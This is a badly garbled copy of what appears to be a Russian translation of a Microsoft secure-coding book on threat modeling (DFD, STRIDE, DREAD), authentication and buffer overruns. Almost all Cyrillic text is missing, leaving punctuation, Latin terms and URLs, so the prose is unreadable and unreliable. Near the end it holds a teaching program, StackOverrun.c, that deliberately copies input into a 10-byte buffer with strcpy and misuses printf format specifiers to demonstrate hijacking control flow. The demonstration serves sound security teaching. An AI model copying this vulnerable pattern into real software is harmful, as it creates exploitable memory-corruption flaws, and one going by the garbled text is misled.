, .
, ,
,
.
,
,
. , Windows
XP ,
.
.
: .
, . ,
, .
, Windows XP
, . :
,
.
Microsoft 2002 ,
(Trustworthy Computing),
.
,
. Web
news.com.com/2009-1001-817210.html.
, , ,
.
, .
:
;
;
, ;
. :
, ,
;
, .
, .
: NTBugTraq BugTraq. Windows NT,
. NTBugTraq
(Russ Cooper), http://www.ntbugtraq.com. BugTraq, ,
,
SecurityFocus, Symantec Corporation.
http://www.securityfocus.com,
20 .
NTBugTraq BugTraq
.
SecurityFocus (http://www.securityfocus.com), VulnDev, PenTest SecProg.
.
:
, . , ,
,
.
Microsoft , ,
, :
. , ;
. ,
, ,
, , , ,
, ,
;
,
;
( )
;
, .
;
;
.
, . , ,
, .
,
, .
. ,
,
.
, ,
.
, ,
. ,
.
, ,
: , .
,
.
.
.
.
, , . (,
, : , ,
.)
, ,
. ,
.
2000 ,
. ,
, .
, ,
. , (
) .
, .
, .
,
. ,
, , ,
, ,
: ,
. :
. : ,
. , Windows (Secure Windows Initiative) Microsoft :
, .
;
(white paper),
.
;
: ,
, ,
.
.
,
.
;
. Web ,
, ,
, .
,
;
, ,
.
. ,
strcpy
, ,
.
.
: .
, ,
, ,
.
.
.
, ,
.
, , , .
, , , ,
.
, ,
, . ,
24 , 7
. ,
, ,
. ,
.
,
.
.
1:
,
, :
5 * , , .
, ,
, .
,
, , .
, .
:
, .
,
, .
2:
,
, , .
, ,
? ?
.
. , IIS 5 ,
(escape character) URL,
UTF-8
. , ,
.
Web http://www.wiretrip.net/rfp/p/doc.asp/i2/d57.htm.
, .
, ,
, .
3: ,
.
. ,
. , , ,
.
. . .
, ,
, . ,
, .
4:
,
, .
,
(, ,
, ) .
.
.
, , .
,
, .
, ,
. , ,
,
. ,
, !
(George Mallory) (1886-1924), :
? : , .
,
, ,
.
, , ,
. (
)
. ,
. ,
.
, ,
.
, : ,
, .
, , ,
.
,
.
,
, , ,
.
,
.
, :
;
,
;
;
;
.
.
, , ,
; ,
, , .
, , ,
, .
,
.
, . ,
, (usability)
,
. , ,
!
: ,
? ,
? : ,
.
,
. ,
, ,
. ,
,
( ). ,
, A B,
, , A 15% B.
,
, , ,
. . , ,
,
,
. :
. 3 19.
: ,
, .
, ,
, , ,
.
:
, .
, .
(
) .
.
. 21 ,
.
, (waterfall approach),
,
. .
. 21.
, . ,
.
. ,
. .
, ; ,
.
2002 ., Microsoft
Windows (Windows Security Push).
8500 . , ,
! , ,
, Windows (
70), , !
, 56 .
, ,
. ( Microsoft
.)
, . ,
, !
? .
. , , :
, , .
. ,
, ,
. , , ,
. :
, .
, , . 2002 .
Windows Security Push
(Network and
Distributed System Security Symposium, NDSS) ,
.
, .
Secure Windows Initiative,
. ,
RSA (Rivest-Shamir-Adleman), .
,
P Q..., , ,
RSA, . : ,
RSA ( , ,
, , ),
. , ,
; .
, , , : RSA
, , ,
, , .
RSA
. ,
, , +
. , ,
, :
.
,
,
.
, , .
, , , ,
. , .
: ,
,
. , ,
,
?
: ,
.
! : =
.
,
, RSA .
: RSA ,
. ,
;
,
. ,
, RSA .
!
Windows Security Push. ,
,
. , , Kerberos, DES (Data Encryption
Standard) RSA, ,
, C++! :
, , ,
, .
8500 .
: , ,
,
. : , , ,
. (
, ) .
( Microsoft).
. ,
!
,
. ,
:
,
,
.
,
, .
.
! ,
. , , ,
, ,
; ,
, . ,
,
.
,
, ! ?
,
.
, , .
, .
,
.
,
, ,
. .
:
IIS 6
, . , , ,
. ,
, ? ;
,
. ,
, . !
, ,
,
.
. ,
: ,
. ,
.
, .
, (
Windows, ,
, HTTP, XML .) ,
(. 22).
. 22.
, :
, ,
,
.
,
, ,
.
! . ,
,
,
.
!
,
, ,
. ! ,
, , .
.
, .
,
, :
: ,
.
: .
: ?
: 10 000 ,
.
:
?
?
: ? 10 000 10 000 !
, , ,
,
. ,
.
,
.
!
2001 . ,
. :
.
1000 ,
C .
10 , 16.
,
, , ,
. ,
. , 45, 41 .
, 54 . ,
55 , . . , , 57,
!
,
, ,
?
!
, .
, ,
, , .
,
Microsoft. ,
. ,
, , , ,
,
. .
!
;
.
. ,
, ,
10 , ,
, 10
..
.
, :
,
. :
. , .
, .
;
. ,
,
.
,
. ,
,
.
, . ,
, .
5.
:
,
.
.
, GPS.
:
;
;
;
, ,
;
( ) ?
? ?
, , ,
.
. ,
,
.
,
, .
.
,
, ,
.
,
. ,
,
, .
, !
.
.
, ,
,
. , ?
, ,
. , ,
. Microsoft
,
.
(. 23) .
,
, ,
.
!
?
-
Fortune 1000
?
.
,
, Web-
?
! - ,
Web-
. ,
-
.
?
,
100 . -
(script kiddies), "" Web-
(DOS-); ;
,
,
.
, .
?
,
. ,
.
,
.
. 23.
,
. :
,
? , ,
.
.
?
?
?
?
: ? ,
? ?
?
?
?
?
?
ISO 17799 Information Technology Code of practice for information security management
(
) ,
, ,
, 10.1.1 10.1 Security
requirements of systems ( ):
,
.
ISO 17799 ,
,
. www.iso.ch.
, ,
ISO 17799, ,
9.6 Application access control (
), 10.2 Security in application systems (
) 10.3 Cryptographic controls ( ).
, . ,
.
, ,
.
. ,
,
.
www.ietf.org;
RFC, IETF ,
, .
:
. :
Microsoft Clip Art Gallery,
(www.microsoft.com/technet/security/bulletin/MS00-015.asp);
ufsrestore, Solaris,
root
(online.securityfocus.com/advisories/3621);
sort UNIX, Apple OS X,
DOS (www.kb.cert.org/vuls/id/417216).
? ,
,
.
, .
,
.
:
(The Net),
(Sneakers) (Hackers)!
,
:
0: ;
1: ;
2: ;
3: ;
4: ;
5: .
,
? ,
,
. ,
.
, , 3,
, 1 2.
, , 3,
.
: ,
0 , ,
.
,
, 3.
, .
: ,
, ,
, ,
.
, , ,
:
,
;
, ,
;
. ;
, .
!
(
, ),
. , ,
.
,
,
,
, .
, ,
.
, , ,
, .
01.09.2002
08.09.2002
1:
22.10.2002
30.10.2002
,
1 ,
Secure Windows
18.11.2002
2:
15.12.2002
10.01.2003
, ,
1:
06.11.2002
27.11.2002
2:
02.02.2003
24.02.2003
2 ,
Secure Windows
28.02.2003
07.03.2003
:
(Release)
03.04.2003
25.05.2003
3:
01.06.2003
4
01.07.2003
3 ,
Secure Windows
14.08.2003
:
(Release)
30.08.2003
21.09.2003
(Release
Candidate)
30.09.2003
30.10.2003
, 4 ,
Secure Windows
!
,
.
.
, , ,
. ,
. , ,
:
, .
,
.
.
, ,
, ,
, , .
, ,
.
, / .
, .
,
, ,
, .
,
, , .
,
, .
DOS: ,
.
,
4, ,
. ,
, . :
. .
,
.
, .
, ,
,
.
. ,
, . ,
. , ,
, .
, ,
. ,
, .
. , ,
, .
, ,
, ,
,
(), , ,
, , ,
.
, ,
(, ,
, ).
, ,
,
. , ,
. , ,
, .
Microsoft
, ,
A1 Orange Book. (
, A1 .
http://www.dynamoo.com/orange.) ,
, ,
,
,
.
, .
, , 10
50 000 ,
, ,
? ,
; ,
.
( ),
,
. ,
!
,
. ,
, , ,
, , .
.
, , ,
. ,
. : ,
, , , 3,
.
, .
, ,
.
! , ,
, .
: ,
4.
,
, ,
.
, . Microsoft
.
.
.
: .
?
:
(checkin) .
, .
.
,
. , ,
, :
. ,
, , ,
, . (Hawthorn
effect) , *.
,
, ,
.
. ,
HTML XML
, .
(code diffs),
. ,
Perl, Windows.
.
windiff.exe** , , .
,
. :
.
, , ,
,
, .
: ,
, . . ,
, ,
, .
,
,
.
, , 3.
, ,
.
.
(George Elton
Mayo, 1880-1949) ,
.
. ,
, . . .
**
. . .
, ,
. Microsoft,
,
,
. ,
, ,
.
, , .
,
, .
2001 . Microsoft
security push. :
;
,
;
;
.
.
security push ( Windows 8 ),
, .
. , ,
, ,
. , security push
, ,
,
. ( , ,
security push ,
, , ,
!)
,
, :
,
. , ,
, , ,
, , ,
. ,
,
. 4;
.
; ;
,
.
;
,
,
. :
, .
,
( )! , ;
,
. . !
, ,
, . :
, 5 ,
, 3 ,
.
,
. , ,
.
:
.
, , .
, ,
.
4 STRIDE,
, , , , , DoS.
!
, ,
, .
,
? ,
, .
. , ,
, , , !
, .
,
, ,
, .
. ! ,
.
,
; ,
, .
, ,
. ,
,
19.
, , , ,
. ?
, ? ,
: , ?
,
, ,
,
. , ,
; .
X, ,
. ,
, . ,
, ,
.
, , readme,
, . , ,
readme .
,
readme
.
! , ,
!
, .
.
,
, ,
. ,
.
, , ,
.
, , ,
.
, , ,
. :
Acknowledgment Policy for Microsoft Security (
Microsoft) (www.microsoft.com/technet/security/bulletin/policy.asp), RFPolicy (
) (www.wiretrip.net/rfp/policy.html) Responsible Vulnerability
Disclosure Process ( ) (Christey)
(Wysopal) (http://www.ietf.org).
,
, Common Methodology for Information Technology
Security Evaluation (
) (www.commoncriteria.org/docs/ALC_FLR/alc_flr.html).
, .
. , . ,
, .
.
? ! ,
, .
: ?
! ,
.
.
, ,
. , ,
.
, ,
. .
.
.
,
,
, .
!
, !
.
3
,
.
,
. ,
,
.
, :
,
. .
SD3: ,
Windows (Secure Windows Initiative),
, :
,
( : secure by design, by
default and in deployment SD3). ,
.
,
. ,
.
, .
, ,
,
, ,
, .
(
2).
,
. 4,
, ,
.
. , .
, .
,
. : ,
. , , .
.
,
.
. (
). ,
, ,
,
.
. ,
, .
,
. ,
, ,
, , ,
,
.
(code rot).
(penetration analysis).
,
. ,
.
.
(hackfests),
.
,
(denial of service attack, DoS
)
.
,
.
.
:
, ,
.
.
,
, Administrators () Domain
Administrators ( ), .
,
7, .
.
( 6).
, .
,
,
.
, .
.
, ,
,
. ,
(patch) .
. ,
, !
,
.
, .
: ,
( 24) !
SD 3. :
. ,
, ; ,
, .
, , ,
,
. , ? :
;
, ;
;
;
;
, ;
;
;
,
;
, ,
;
,
( , ,
, );
;
.
, ,
, ,
.
, ,
,
. .
.
.
(Norman Cousins) (1915-1990),
.
(George Santayana) (1863-1952),
.
(Archibald McLeish)
(1892-1982),
,
. .
?
?
?
?
?
, . ,
,
, ,
.
.
Microsoft ,
,
Microsoft (Microsoft Security Response Center) www.microsoft.com/security.
,
, .
:
;
;
;
;
;
;
;
, ,
;
, , ,
(code diffs)* .
, ,
.
: ,
.
.
, .
. . .
, ,
( , ).
,
: ? ,
, .
. 100
.
, ,
, .
, ,
.
.
, .
,
.
, ,
. 20 .
. ,
,
. ,
,
!
,
,
,
. ,
.
19
, , :
(TCP UDP);
(named pipes);
(RPC endpoints);
;
, ;
, ;
ISAPI;
Web;
;
,
(Access Control List, ACL).
,
,
. , ,
SYSTEM, !
Microsoft
, :
.
, ,
.
,
.
, , ,
. , ,
, .
.
, 80/20: 20% ,
80% .
20% , 80% ,
. (
. , , :
DWORD, 28 ,
!). , ,
.
, :
, .
: ,
, , ,
.
.
.
,
.
,
. 20 ,
, : ,
, .
? .
, .
, :
, ,
,
? :
, ,
?
: , , !
. , : !
, ,
?
, !
,
, : .
, ,
, .
! ,
,
.
. ,
,
.
: ,
,
. . ,
, ,
.
? ,
, XVI ,
. ,
: ,
. .
, .
,
, . * .
.
,
, : , .
. .
.
, ?
, ,
:
;
,
. , .
,
. ,
. ,
, ;
;
,
;
,
( ,
);
:
;
;
.
,
,
. .
,
. :
.
, . ,
,
. , , .
, ,
?
(single point of failure),
.
! ,
. !
,
, , .
,
, , , , ,
,
. .
,
, , .
,
.
.
, :
? .
, .
, ,
,
. ,
? ( , , ,
,
.)
:
,
, runas,
Run as different user
( ) ( Windows 2000) Run with
different credentials ( ) ( Windows
XP).
.
. ,
.
!
,
, .
, ,
.
,
. , ,
, , ,
. ,
, .
, .
.
, . ,
,
, , .
.
,
, ,
.
7 ,
.
, ,
, . ,
.
:
, ,
,
.
.
2002 . 2.3.1 3.3 OpenSSH,
Apple Mac OS X, FreeBSD OpenBSD,
.
, UsePrivilegeSeparation
sshd_config. Web www.openssh.com/txt/preauth.adv.
Microsoft IIS 6,
Windows .NET Server. IIS 5, Web
.
HTTP (w3wp.exe),
(Network Service),
(Local System). inetinfo.exe,
,
HTTP, .
Web Apache.
httpd root;
httpd,
nobody.
. , ,
, ,
, ,
.
.
:
,
. ,
, 1
2. , !
.
,
.
,
,
.
: SMB TCP/IP
Microsoft.
SMB (Server Message Block)
Microsoft LAN
Manager, 80. , SMB
, , Windows NT 4 Service Pack 3 Windows 98.
: (man-in-the-middle) ,
, .
,
,
. SMB ,
, , .
SMB
.
SMB ,
. :
.
:
SMB.
TCP/IP. IPSec (Internet Protocol Security)
TCP/IP ,
( ). TCP/IP ,
.
,
:
. ,
, ,
, .
, .
, .
.
. 15 :
DNS, ,
. , ,
.
,
, ,
Web .
,
. ,
.
! , , , ,
.
.
, !
, .
, (bugs).
, .
. , ? ,
Web? ?
, , .
: ,
, , .
: ,
. .
, , ?
: .
,
.
( ).
, ,
,
.
,
. ,
, ,
, Windows.
,
.
, .
, ,
.
(Jerome Saltzer)
(Michael Schroeder) The Protection of Information in Computer Systems (
) (web.mit.edu/Saltzer/www/publications/protection).
:
, , .
,
,
:
!=
Secure Windows Initiative.
,
. ,
,
. SSL (Secure Socket Layer)
TLS (Transport Layer Security),
. ( ,
,
).
,
, ,
.
. ( ,
, ).
,
.
, , ,
.
, ,
.
.
,
. ,
.
, 2.0
Lotus 1-2-3 1985 .
80 90;
.
:
. .
, , .
,
, (
), ( ).
Web, URL
(cross-site scripting), HTML
JavaScript. ,
, .
,
. Microsoft
Office XP.
.
,
. , :
. , : , ,
, , , . . , ,
. ,
.
,
.
: , ,
, , .
,
. , ,
, ! ,
.
!
,
(patched) . :
, .
,
(40104 ..)
, ,
. , ProcessData,
. ,
. ProcessData
, ,
.
,
, .
, .
, , .
.
, ,
. . , ,
,
(
).
.
,
!
! , ,
. .
, ,
.
(threat model), .
,
, ,
.
.
, .
, , ,
, , .
Windows Security Push 2002 ,
,
, ,
,
, (
9), . ,
Windows Security Push ( Microsoft)
, , ,
.
, , ,
, ,
, .
,
, .
, !
.
. .
, , ,
!
:
, , !
. ,
,
,
.
. ,
.
. ,
,
.
! ,
, ,
!
,
.
, ,
.
. , ,
.
,
.
, ,
A, B, , A
. ,
A. , , ,
, ,
.
:
.
19.
,
.
, .
:
.
:
1. ;
2. ;
3. , ;
4. ;
5. ;
6. ;
7. .
(. 41)
: .
, ,
.
. 41.
.
.
.
, ,
. ,
, ,
.
,
, ,
, . ,
. ,
,
. ,
: ,
. ,
, .
,
, . (
,
, !)
,
, ,
, .
.
, Microsoft,
.
,
.
!
. ,
. ,
, !
,
, , .
,
.
: ,
, ,
. , ,
.
, . ,
Microsoft, 2001 ., ,
.
, ,
, .
2002 ., Microsoft @stake (http://www.atstake.com),
,
, Microsoft. ,
@stake,
, .
Microsoft SQL Server
, ,
. , SQL Server
. SQL Server ,
(data flow diagrams, DFD). ,
, DFD,
.
DFD,
. ,
,
.
, DFD
. ,
, DFD
. UML (Unified Modeling Language),
(activity diagram),
DFD. UML
,
, DFD. , .
DFD
UML.
.
DFD :
, , ,
. DFD
.
DFD (. 42).
,
. DFD
.
, ,
. :
.
: .
0, 1, 2 . . (. 43).
,
, ..
. 42.
DFD
DFD,
Web .
. 44
.
DFD
:
.
, , ,
;
, .
, Web ,
;
, . Web
, , ,
;
. 43. DFD
DFD
.
, (, ,
. .) ( );
.
. 44
. . 45
1 .
;
. 44. DFD
DFD, :
;
;
;
;
(: ,
, );
(
: , , );
(:
, );
. 45. DFD 1
(:
, , ).
, ,
. ,
, . 8 DFD,
,
. ,
,
, DFD!
,
DFD 1.
!
, .
, ,
.
. 46
(, , ).
. 46.
. 41.
4-1.
.
,
5
.
: Web Web.
:
,
. :
,
Web
Web, Web
Web
HTML
Web
,
,
Web
,
Web, Web
Web
HTTP
Web
Web
: WWW
,
.
Web
Web
Web. Web
,
.
,
4-1.
()
.
,
,
. , ,
,
.
(threat target). , ,
, . ,
.
: STRIDE
,
:
, ;
;
;
?
.
, STRIDE
.
(Spoofing identity)
.
(
) .
,
HTTP: (Basic authentication)
(Digest authentication). RFC 2617. ,
HTTP
(Blake), (Fletcher)
,
.
DNS (DNS spoofing)
DNS (DNS cache poisoning). :
Apple.
DNS, Web news.com.com/
21001001942265.html, DNS.
(Tampering with data)
. :
( ),
, (
, ).
, ACL [, Every
one: Full Control (: )].
(Repudiation)
( ), ,
. , , ,
, .
(non-repudiation)
. ,
.
,
. ,
.
(Information disclosure)
, ,
, ,
. , ,
:
, .
(Denial of service)
,
Web .
DoS
.
(distributed denial of service,
DDoS), Trinoo Stacheldraht. Web
staff.washington.edu/dittrich/misc/ddos/.
DoS ,
, .
:
(Cheryl) Web,
(Lynn) ,
. Web
,
, .
(Elevation of privilege)
,
.
,
. . :
,
,
. ,
.
, . STRIDE
.
. ,
.
, .
STRIDE DREAD (
) , Microsoft
, (Loren Kohnfelder), (Praerit
Garg), (Jason Garms) .
, .
,
. , ,
:
root ,
.
, ,
. , SMTP,
,
.
!
, , .
(threat trees)
STRIDE.
,
OCTAVE (Operationally Critical Threat, Asset, and Vulnerability Evaluation) (http://www.cert.org/octave).
(fault trees). ,
.
( ),
.
. (Edward Amoroso)
Fundamentals of Computer Security Technology (
) . .
, , ,
,
, ,
.
, .
, ( )
(asset).
(threat target).
(
),
. :
, .
.
?
!
, .
, .
.
, . ,
.
, , .
, ,
, .
,
.
, .
, ,
.
.
: ,
,
.
.
, , .
,
.
. DFD .
, Web
(, ) (. 47).
. 47. DFD 1, Web
, ()
,
,
.
. .
:
, , (sniffer)
, (promiscuous mode),
,
Web* . ,
, .
. 48 , ,
.
,
.
, ,
. . .
. ,
( ),
. ,
, , (promis
cuous mode). , ,
.
. 48.
,
, .
[ (I)],
. :
,
. (1.0)
(5.0).
!
.
: , HTTP
(1.1),
, (1.2.1) ,
(1.2.2) (1.2.3).
( HTTP),
1.2.1 1.2.2. ,
. :
:
( 1.2.2.1 1.2.2.2),
(1.2.2.3).
(
).
, .
,
.
. ,
. 48.
1.0
1.1 HTTP! ()
1.2
1.2.1
1.2.2 ,
1.2.2.1 ()
1.2.2.2
1.2.2.3
1.2.3
1.2.3.1
,
. ,
, .
, ,
, (. 49).
,
. .
, .
:
. . 411 , 3.2 ,
3.2.1 3.2.2 .
, ()
. .
. 49.
,
(. 42).
4-2. ,
,
.
,
, . ,
(1.05.0)
(14.0)
STRIDE.
STRIDE
4-2.
()
.
,
( )
.
, ,
. ,
.
.
.
. : ,
, ,
( )
,
. ,
. ,
,
.
!
, , .
,
, , .
,
.
( RiskCO)
( ) ,
. 1 10:
DREAD
,
Microsoft, DREAD ( RiskDREAD)
.
(Damage potential)
. (10)
. 10.
.
, .
(Reproducibility)
. ( 10),
, ,
, .
. .
(Exploitability) ,
. ,
, (10).
100 000 000 ,
1. : , [ ,
(script kiddies)],
10 .
. ,
,
10 . ,
, .
, (Affected users)
, .
: 100%
10, 10% 1 . ,
. ,
.
: , ,
, , .
, .
, ,
. 100 .
.
(Discoverability)
. , ,
, 10 ,
.
DREAD (
5).
, .
, :
1:
8
10
: 100%
10
: ,
10
: ,
RiskDREAD: (8 + 10 + 7 + 10 + 10) / 5 = 9
9 10 ,
, ,
.
! , ,
. : ,
, ! !
, ,
, .
, (Christopher W. Klaus)
Internet Security Systems, ,
. ,
:
: ?
, ? ,
;
? ,
? ?
;
? , ,
, ,
.
.
: , ,
STRIDE DREAD
, .
, STRIDE
, ,
, , ,
, , DREAD.
STRIDE .
:
;
;
,
;
;
;
, ?
,
.
DFD
. ,
, .
:
, .
.
Windows Security Push ,
,
. ,
,
.
, , ,
. ,
,
. , , .
,
, , , .
, ,
.
? , , 30
?
? .
, ?
? ,
?
? , ?
? , ?
, ,
. , ,
5 , , , ,
5 ,
15 , 10
.
. , ,
.
,
. ,
.
, DFD
(. 43).
4-3. DFD-
STRIDE
.
( ,
), ( ,
) .
.
(reverse engineering)
.
.
,
.
,
, .
,
.
,
.
, ,
.
.
,
,
,
.
(. 44 49) ,
. . 48 . 410 414 (
) ,
. 44 49.
4-4.
(5.0 1.0)
: 9
: 10
: 7
: 10
: 10
: 9
,
.
, ,
, .
,
, ,
, .
, Why your switched network isnt
secure ( )
http://www.sans.org
4-5.
Web-
: 7
: 7
: 7
: 10
: 10
: 8,2
4-6.
.
Web
. (
)
: 6
4-6.
()
: 6
: 7
: 9
: 10
: 7,6
DoS,
Web
, .
,
.
3.3:
(Cartesian join).
, SQL. ,
,
,
650 000 , 113 000, 75 100,
5 165 095 000 000 000
.
3.4:
.
,
(11.0), ,
,
.
, ,
(, DoS),
4-7.
(12.0)
: 10
: 5
: 5
: 10
: 10
: 8
4.3
(2.0)
,
(12.0). DFD (. 45),
4-8.
(5.0)
: 10
: 2
: 2
: 1
: 10
: 5
Web, .
, ,
Web,
Local System.
,
Web.
,
. ,
,
4-9.
(5.0)
: 10
: 2
: 2
: 8
: 10
: 6,4
: (
)
[ DNS (flood) ]
. 410.
. 411.
. 412.
. 413.
. 414.
,
?
(
, ). . 410. ,
2.3 , , ,
.
, ?
, : ,
,
.
(zero-day attack) , ,
,
, exploit.
DREAD
.
! .
,
, ,
.
,
, .
1.
, DFD. DFD
,
, , .
2. STRIDE ,
. ;
.
3.
.
4.
DREAD .
5. .
,
.
:
;
;
;
, .
1:
,
,
.
,
. ,
.
: .
2:
, . Microsoft Internet Information Services (IIS) :
(basic authentication),
,
, ,
SSL/TLS.
1, :
, ,
. (
24.)
, , . ,
,
.
: ,
,
. ,
,
.
, ,
!
. ,
.
3:
,
. . ,
: .
, ,
. ,
:
, . ,
!
4:
: .
,
, ,
. ,
.
, ,
. .
, .
. , ,
. ,
, Kerberos
. . 410 ,
, STRIDE.
4-10. ( )
MAC
,
, . 410,
, .
, ,
(
).
,
.
, .
, ,
. ,
,
, .
, ,
(principal), ,
, , .
, .
(credentials),
, ,
( ).
Windows .
,
. Windows
:
;
;
;
Microsoft Passport;
Windows;
NTLM (NT LAN Manager);
Kerberos v5;
X.509;
IPSec (Internet Protocol Security);
RADIUS.
. ,
(Basic Authentication) , ,
Kerberos.
. , ,
, .
, ,
. . 411 ,
.
4-11.
Microsoft Passport
NTLM
Kerberos
X.509
IPSec
()
()
RADIUS
,
HTTP 1.0 (. RFC 2617 http://www.ietf.org/rfc/rfc/rfc2617.txt). , Web Web
,
. Base64!
, :
,
,
SSL/TLS IPSec.
, , RFC 2617,
: ,
. , ,
HTTP, : LDAP,
IMAP (Internet Message Access Protocol), POP3 (Post Office
Protocol 3) SMTP (Simple Mail Transfer Protocol).
,
. , Microsoft ASP.NET
IHttpModule FormsAuthenticationModule.
.
Web,
. Web Web
( SSL/TLS),
. ,
, ASP.NET, XML.
ASP,
:
<%
    Dim strUsername, strPwd
    strUsername = Request.Form("Username")
    strPwd = Request.Form("Pwd")
    If IsValidCredentials(strUsername, strPwd) Then
        ' Authenticated!
        ' Do the work the user asked for.
    Else
        ' Not a valid user name or password.
        Response.Redirect "401.html"
    End If
%>
.
.
Microsoft Passport
Passport ,
Microsoft. (
Microsoft Hotmail Microsoft Instant Messenger)
( 1800flowers.com, Victoria's Secret, Expedia.com,
Costco Online, OfficeMax.com, Office Depot 800.com).
, Passport, Web,
Passport, . Web
Passport
Passport Software Development Kit (SDK) c http://www.passport.com.
Passport ASP.NET PassportAuthenticationModule. Microsoft Windows .NET Server
LogonUser. , Internet Information Services 6
(IIS 6) Passport
, : ,
, Windows X.509.
Windows
Windows : NTLM
Kerberos. SSL/TLS,
. Windows
SSPI (Security Support Provider Interface).
SSP (Security Support Provider). Windows
SSP: NTLM, Kerberos, Schannel Negotiate. NTLM
, Kerberos 5, Schannel
SSL/TLS.
Negotiate ,
, , Windows 2000,
NTLM Kerberos.
, SSPI,
(Jeffrey Richter) (Jason Clark) Programming Server-Side Applications for Microsoft Windows 2000 (Microsoft Press, 2000) ( ., . .
NTLM-
NTLM Windows,
Windows CE. NTLM
Windows, , IIS,
Microsoft SQL Server Microsoft Exchange. NTLM. 2,
Windows NT SP 4,
1: (man-in-the-middle).
, NTLM :
, .
Kerberos v5
Kerberos v5
(Massachusetts Institute of Technology, MIT) RFC 1510 (http://www.ietf.org/rfc/rfc1510.txt). Windows 2000 Kerberos
Active Directory.
Kerberos ,
: . Kerberos ,
NTLM, .
Kerberos
(service principal
names, SPN) : Designing
Secure Web-based Applications for Microsoft Windows 2000 (Microsoft Press, 2000)
(. , . , . Web
Microsoft Windows 2000. . : ; .: , 2001).
X.509
X.509 SSL/TLS.
Web SSL/TLS HTTPS, HTTP,
SSL/TLS
. , ,
, .
, , ,
.
, SSL/TLS
. ,
SSL/TLS
. ,
X.509,
, .
,
. Windows 2000/XP
. Windows
.
X.509, ,
Designing Secure Web-based Applications for
Microsoft Windows 2000 (Microsoft Press, 2000) (. , . , .
Web Microsoft Windows 2000.
. : ; .: , 2001).
,
, (, Web,
LDAP) ,
, .
,
, NetBIOS \\Northwind, DNS http://www.
northwindtraders.com IP 172.30.121.14. .
DNS,
. , ,
.
IPSec
IPSec ,
. Kerberos
, IPSec
. IPSec
, :
( ). Windows 2000/XP
IPSec.
RADIUS
, Microsoft Internet Authentication Service (IAS),
RADIUS (Remote Administration Dial-In User Service)
, RFC 2058.
Windows 2000
Active Directory.
, ,
. ,
. ,
.
Windows , :
(Access control lists, ACL);
;
IP;
.
Windows NT/2000/XP ACL.
ACL (access control entries, ACE),
,
. , (Blake)
, (Cheryl) ,
.
ACL 6.
, ,
, ,
, .
.
7.
IP-
IP (IP restrictions) IIS,
Web (, )
Web, IP,
DNS.
. , Microsoft SQL Server ,
,
. , COM+, ,
,
. ,
.
, .
, , . ,
10 , ,
, 20.
, .
Windows
:
SSL/TLS;
IPSec;
DCOM RPC;
EFS.
SSL/TLS
SSL Netscape 90.
, ,
MAC (Message Authentication Code) . TLS
SSL, IETF (Internet Engineering Task Force).
IPSec
, IPSec ,
MAC .
IPS .
IPSec
, IPSec IP TCP/IP.
DCOM RPC
DCOM RPC ,
. ,
DCOM RPC .
16.
EFS
Windows, 2000, EFS (Encrypting File System) ,
NTFS. SSL, TLS, IPSec DCOM/RPC ,
EFS .
,
.
. ,
, !
, .
, 6.
, , MAC-
,
.
.
, , .
( )
, . 128
160 . ,
, .
, , ,
.
, . , .
, MAC .
MAC
,
( ). MAC
, .
MAC, , ,
, .
MAC,
; ,
, .
,
, ,
. ,
, , .
Windows API CryptoAPI (Cryptographic API) , ,
MAC .
,
8.
, (logging),
,
,
. Windows Windows, Web
IIS , SQL Server Exchange.
! .
,
, ,
.
,
(filtering)
.
,
, IP.
(throttling), ,
,
. ,
, .
.
(quality of service)
, .
, .
,
. 7 .
,
. 412 .
4-12. ,
STRIDE
SSL/TLS ( IPSec)
Web
Web
Web.
ACL,
Web
IP.
,
( ,
,
..). ,
TI
SSL/TLS DCOM/RPC
.
. SSL/TLS MAC
.
DCOM/RPC .
IPSec
. . .
4-12.
()
STRIDE
.
Web
SSL/TLS,
,
.
.
: Kerberos,
,
. .
! .
,
,
.
. 413 ,
,
. ,
.
,
.
.
4-13.
HTTP
TI
SSL/TLS, WTLS (
TLS)
IPSec
HTTP
.
IPSec
.
.
4-13.
()
RPC DCOM
TI
.
TI
Mail Extensions)
,
PIN
PIN
PIN!
, ,
IP.
IP
.
S, I
DoS,
,
,
.
,
15 .
cookie
cookie
Web
cookie
MAC
cookie
Web
. . .
4-13.
()
,
.
,
,
.
9
,
SSL/TLS,
IPSec Kerberos
HTML
Web
,
Web.
10
.
,
,
.
.
(replay)
T, R, I D
.
!
(
SSL/TLS, IPSec
RPC/DCOM)
.
.
MAC.
4-13.
()
T, I D
,
SeDebugPrivilege
S, T, R I,
DE
.
.
Windows NT.
,
,
23
S, T, R I,
DE
,
.
ACL
,
.
,
,
TI
,
,
SSL/TLS IPSec
Web
TI
,
EFS.
.
EFS
,
,
. ,
, .
:
. , ,
, .
,
, ,
.
: ,
(, DFD),
STRIDE,
, DREAD,
STRIDE.
, ,
. Microsoft
,
.
I I
5
1:
.
60.
, . (Robert T. Morris) 1988 .
,
, . 2001 .,
, buffer, security
bulletin Microsoft Knowledge Base (http://search.support.microsoft.com/
kb) 20 , , ,
.
BugTraq (http://www.securityfocus.com)
, .
,
. Microsoft (Microsoft
Security Response Center) ,
100 000 , .
.
. ,
.
,
,
.
, ,
5 1:
. , . , ,
.
(
C C++,
),
.
Windows (Windows Security Push)
2002 . Microsoft .
.
, ,
.
Strsafe.h.
, BASIC (
Visual Basic, BASIC,
), Java, Perl, C#
,
.
C ++.
++, ,
, ++.
,
. , , . ,
, .
,
buffer overrun. !
, , .
,
, .
.
,
, , : ,
, . ,
: . .
. ,
.
,
,
ANSI Unicode.
, .
,
.
, ,
, ,
.
II
, .
,
strcpy.
. , ,
,
(command shell) .
, :
,
. ,
, .
,
. (
, ,
.) .
,
.
/*
StackOverrun.c
Demonstrates a classic stack-based buffer overrun: foo copies its
argument into a 10-byte buffer with strcpy and no length check.
The goal of the demonstration is to make the program call bar,
which is never called legitimately.
*/
#include <stdio.h>
#include <string.h>

void foo(const char* input)
{
    char buf[10];

    // printf is called with no arguments for the %p specifiers: a cheap
    // trick to dump what is on the stack. The same trick reappears in the
    // format-string section of this chapter.
    printf("My stack looks like:\n%p\n%p\n%p\n%p\n%p\n%p\n\n");

    // Pass the user input straight to secure code public enemy #1.
    strcpy(buf, input);
    printf("%s\n", buf);

    printf("Now the stack looks like:\n%p\n%p\n%p\n%p\n%p\n%p\n\n");
}

void bar(void)
{
    printf("Augh! I've been hacked!\n");
}

int main(int argc, char* argv[])
{
    // Blatant cheating to make life easier on myself.
    printf("Address of foo = %p\n", foo);
    printf("Address of bar = %p\n", bar);

    if (argc != 2)
    {
        printf("Please supply a string as an argument!\n");
        return -1;
    }

    foo(argv[1]);
    return 0;
}
Hello, World!.
foo
bar. %p printf.
, ,
foo, ,
DLL.
bar. foo printf,
,
. , foo
